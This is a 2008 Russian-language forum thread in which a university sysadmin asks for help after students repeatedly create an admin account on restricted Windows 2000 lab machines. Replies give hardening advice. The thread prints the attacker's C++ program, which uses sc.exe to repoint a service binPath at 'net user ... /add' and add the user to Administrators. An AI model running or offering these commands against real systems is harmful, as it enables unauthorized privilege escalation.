Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  | Правила  

Компьютерный форум OSzone.net » Информационная безопасность » Защита компьютерных систем » Утилиты - Взломали при помощи C++ и SC.ехе

Ответить
Настройки темы
Утилиты - Взломали при помощи C++ и SC.ехе

Пользователь


Сообщения: 88
Благодарности: 0

Профиль | Отправить PM | Цитировать


Привет всем.
Сразу прошу прошение за ошибки (не из России я).
Такая проблема у миня, я СисАдмин в Университете (администрираю 40 комп. OS : Win 2000 Pro (all hotfixes))
В прошом году меня тоже взломали, уже не знал чо делать, но нечаина на один компютар нашол утилиты : sc.exe и Service Permissions Checker.
Вот што они делали :



После того как удалил всё, вот што показовала :



Карочи, удалил я Macromedia Licensing.exe, и Сервис тоже удалил в регедит, думал што всё теперь проблем больше не будет, не тут то было.
Согодня опять спалил новыи Юзер "Хакер", и на Диск Д: нашол код зделан в С++.

Код: Выделить весь код
// sys.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <stdlib.h>
#include <windows.h>
#include <conio.h>
int main(int argc, char* argv[])
{
//	WinExec("sc.exe queryex \"Macromedia Licensing Services\" > d:\\log.log.log",SW_SHOW);
	WinExec("sc.exe config \"Macromedia Licensing Service\" binPath= \"net user Xakep Xakep /add\"",SW_SHOW);
	Sleep(1000);
	WinExec("sc.exe start \"Macromedia Licensing Service\"",SW_SHOW);
	Sleep(1000);
	WinExec("sc.exe config \"Macromedia Licensing Service\" binPath= \"net localuser Administrators Xakep /add\"",SW_SHOW);
	Sleep(1000);
	WinExec("sc.exe start \"Macromedia Licensing Service\"",SW_SHOW);
	getch();
	return 0;
}

..и ищо несколько фаилов, вылажу на рапид штоб посмотрели:
http://rapidshare.com/files/87310556/sys.rar.html

В моём зале много програм есть в том числе и Visual Studio ну конечно есть и cmd.exe
Все студенты работают под User - Restricted user.
С: - read & Execute, в regedit тоже самое, и в Group Policy по игрался.

Не понемаю как они создают новыи Сервис в регедит, User имеет права толыко читать, есть предположение што они под Юзер : System делают ето.
Помогите пожалуиста, не знаю уже што делать, спасибо аднозначно, жду ответов штоб решить проблему.

Отправлено: 20:12, 28-01-2008

 

Пользователь


Сообщения: 88
Благодарности: 0

Профиль | Отправить PM | Цитировать


Нет, нечево не получилось Много програм не рабатают, даже Symantec Anticirus не запускаетця...
пфффф не жаю больше чо делать...

Отправлено: 19:08, 29-01-2008 | #11



Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля.


Dr. Piligrim


Сообщения: 2443
Благодарности: 519

Профиль | Отправить PM | Цитировать


Цитата eXtremer:
Щас я перечеслю только несколыко програм которые есть в зале :
Microsoft Office, Oralce, MSSQL, Maple, Corel Draw, Photoshop, Macromedia, Visual Studio...и ищо много, много различных прогам,
так што што ты мне хочеш скзать НЕ выполнима ! »
Ну а что поделать, сложно всё прописывать, но выполнимо же )
Using Software Restriction Policies to Protect Against Unauthorized Software , можно закрутить гайки доп.-но применением шаблона hisecws.inf через оснастку Security Configuration and Analysis или использовать сторонный софт, позволяющий контролировать доступ... или что-то типа vmware

-------

Virus? Malware? - Начните отсюда
Проблема в вашей теме решена? - Отметьте её решенной в настройках темы
Free Antivirus Software......Полиморфный AVZ


Отправлено: 23:11, 29-01-2008 | #12


Пользователь


Сообщения: 88
Благодарности: 0

Профиль | Отправить PM | Цитировать


Усио решил поставлю Deep Freeze до выеснение апстаятельств...штоб не иб* много, в суботу поставлю.

Последний раз редактировалось eXtremer, 30-01-2008 в 12:50.


Отправлено: 09:56, 30-01-2008 | #13


Пользователь


Сообщения: 88
Благодарности: 0

Профиль | Отправить PM | Цитировать


Вчера сам сел на один комп. и начел игратся с sc.exe , нечего не получалось, не старт, не стоп, не create service - access denied, так што они уже наверое под Админом делают этот service.
И ищо што интересно, почему назывют этот сервис только Macromedia Licensing ?
есть два варината : 1. или называют так штоб я не сполил новыи созданыи сервис, либо 2. они могут создать толыко этот сервис!Надо както зделать штоб они не могли создать этот сервис, но как ? может бить сам его создать а потом убрать SYSTEM и User в regedt32 все права ?!

Отправлено: 13:15, 30-01-2008 | #14


Dr. Piligrim


Сообщения: 2443
Благодарности: 519

Профиль | Отправить PM | Цитировать


eXtremer, поменять пароль админа (можно и имя Administrator переименовать), провести аудит и снести всех других локальных админов (можно с помощью групп. политики тут). Можно дополнительно воспользоваться утилитой syskey How to use the SysKey utility to secure the Windows Security Accounts Manager database
Есть предположение что хакеры
а)повышают привилегии через уязвимости установленного софта, поэтому поставить все патчи на весь установленный софт
б)используют для своих нужд ранее внедренный backdoor/trojan, поэтому провести глубокий анализ всего софта всевозможными утилитами, включая антивирусные (AVZ, CureIT, SdFix, ComboFix)
Цитата eXtremer:
назывют этот сервис только Macromedia Licensing »
Вероятно кто-то поломал один раз, все остальные действуют по шаблону, скорее всего сервис можно назвать как угодно (если это только не зашито в уже готовой используемой ими программе для взлома)
Кстати, можно попробовать дополнительно установить HIPS (типа processguard или лучше defencewall ) и закрыть HIPS паролем.

-------

Virus? Malware? - Начните отсюда
Проблема в вашей теме решена? - Отметьте её решенной в настройках темы
Free Antivirus Software......Полиморфный AVZ


Последний раз редактировалось Pili, 30-01-2008 в 15:59.


Отправлено: 15:42, 30-01-2008 | #15


Пользователь


Сообщения: 88
Благодарности: 0

Профиль | Отправить PM | Цитировать


Скачал сегодня ProcessGuard 3.410, посталвю в субботу, но не знаю елси это штота даст...

Отправлено: 10:41, 31-01-2008 | #16



Компьютерный форум OSzone.net » Информационная безопасность » Защита компьютерных систем » Утилиты - Взломали при помощи C++ и SC.ехе

Участник сейчас на форуме Участник сейчас на форуме Участник вне форума Участник вне форума Автор темы Автор темы Шапка темы Сообщение прикреплено

Похожие темы
Название темы Автор Информация о форуме Ответов Последнее сообщение
Легализация при помощи GGK SamLab Лицензирование продуктов Microsoft 2 16-01-2008 11:43
Взломали. Что делать? Gangabass Общий по Linux 5 07-09-2007 10:25
Ошибка rundll32.exe при открытии любого ехе-шника Bozs Microsoft Windows 2000/XP 6 19-10-2006 15:13
Прошу помощи при работе со скайнером. Belferman Moisey Microsoft Windows 95/98/Me (архив) 2 15-06-2006 14:06
Сеть. При помощи модемов lossen Сетевые технологии 33 10-08-2004 19:04




 
Переход